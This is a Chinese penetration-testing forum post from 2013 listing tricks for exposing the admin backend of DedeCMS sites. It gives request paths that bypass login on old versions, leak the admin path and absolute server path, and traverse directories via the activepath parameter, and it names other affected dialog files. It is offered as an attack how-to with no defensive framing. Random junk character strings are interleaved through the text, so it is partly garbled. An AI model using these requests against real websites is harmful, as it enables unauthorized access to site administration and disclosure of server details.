中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]

作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
7 y, U/ T' Y1 |, W) n1 k( J0 H
* i% k* |- P: y0 i员帐号,新版本的就直接转向了后台.! Z) j, ?, D6 f3 k9 Z$ h
) F' j( k" P, c2 W
2.include/dialog/config.php会爆出后台管理路径
! o, N- \1 D, \+ s6 k& C- Y
! t1 k& F/ ~; g' ^% b3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录' ^8 M& C' a$ C# x
7 Z# v+ Q% a  m9 |6 p; Y$ P3 I
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
7 {: y( w$ L: w1 K
! v" d& m) N# R) A) q5 D5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
1 g; F" L4 X* z9 S1 g. d0 G
; Q1 ^9 S/ q& R/ F$ u6 ^7 e到根目录去.不过这些版本的访问地址有些不同.
% P8 l0 a. H- ~地址为require/dialog/select_soft.php?activepath=/././././././././, c, `7 K9 I7 O; U8 v

1 N0 U' G, I" {include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
5 Y5 T6 i' V. R  {+ |存在相同问题的文件还有+ l. k% u, d0 t2 C9 ?7 |- Q
include\dialog\select_images.php( p) S! N4 [1 T( E+ C: j9 l# o
include\dialog\select_media.php
  ?* D3 l/ \# b, O; t; yinclude\dialog\select_templets.php​' D& M5 S; D7 J7 F) i! c





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2